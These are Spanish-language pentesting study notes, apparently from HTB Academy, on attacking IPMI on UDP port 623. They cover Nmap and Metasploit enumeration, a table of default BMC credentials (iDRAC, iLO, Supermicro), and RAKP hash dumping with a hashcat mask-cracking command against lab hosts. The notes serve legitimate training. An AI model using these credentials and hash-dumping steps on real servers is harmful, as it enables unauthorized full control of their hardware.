623 UDP (IPMI)

IPMI

TIP La Interfaz de Gestión Inteligente de Plataformas (IPMI) es un conjunto de especificaciones estandarizadas para sistemas de gestión de host basados en hardware. Se utiliza para la administración y monitorización de sistemas, actuando como un subsistema autónomo que opera independientemente de la BIOS, la CPU, el firmware y el sistema operativo del host.

NOTE IPMI permite a los administradores gestionar y monitorizar sistemas incluso si están apagados o no responden, sin necesidad de acceso al sistema operativo. Se emplea típicamente:

• Antes del arranque del sistema operativo para modificar configuraciones del BIOS.

• Cuando el host está completamente apagado.

• Para acceder al host tras una caída del sistema.

Componentes requeridos para su funcionamiento:

• BMC (Baseboard Management Controller): microcontrolador esencial en IPMI.

• ICMB (Intelligent Chassis Management Bus): interfaz de comunicación entre chasis.

• IPMB (Intelligent Platform Management Bus): extensión del BMC.

• Memoria IPMI: almacena eventos del sistema y otros datos.

• Interfaces de comunicación: sistema local, serial, LAN, ICMB y PCI.

---

Enumeración

QUOTE IPMI se comunica mediante el puerto UDP 623. Los sistemas IPMI están representados por los BMC, usualmente sistemas ARM embebidos con Linux, conectados directamente a la placa base del host. Pueden estar integrados o añadirse mediante tarjetas PCI.

DANGER Los BMC más comunes en pruebas de penetración son HP iLO, Dell DRAC y Supermicro IPMI. Obtener acceso a un BMC equivale prácticamente a acceso físico total al sistema: reinicio, apagado o reinstalación del SO. Estos BMC ofrecen consola web, protocolos como Telnet/SSH y acceso por UDP 623.

# Enumeración con Nmap
sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

# Escaneo de versiones con Metasploit
use auxiliary/scanner/ipmi/ipmi_version
set rhosts 10.129.42.195
show options
run

Producto	Usuario	Contraseña
Dell iDRAC	root	calvin
HP iLO	Administrator	Cadena aleatoria de 8 caracteres (números y letras mayúsculas)
Supermicro IPMI	ADMIN	ADMIN

---

Configuraciones peligrosas

INFO Si las credenciales por defecto fallan, se puede explotar una vulnerabilidad del protocolo RAKP en IPMI 2.0. Durante la autenticación, el servidor envía un hash SHA1/MD5 con sal de la contraseña antes de autenticar al cliente.

# Ataque con hashcat
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u,

# Extracción de hashes con Metasploit
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts 10.129.42.195
show options
run

BUG Si Metasploit no recupera la contraseña, puedes configurar un diccionario como rockyou.txt dentro del propio Metasploit para forzar el crédito.

---

Redes sociales

• LinkedIn: https://www.linkedin.com/in/tuch0/

• Instagram: https://www.instagram.com/tuch0_/

• YouTube: https://www.youtube.com/@tuch0_

• GitHub: https://github.com/Tuch0

• Web personal: https://tuch0.com/

📄 Apuntes personales de HTB Academy. Para uso educativo.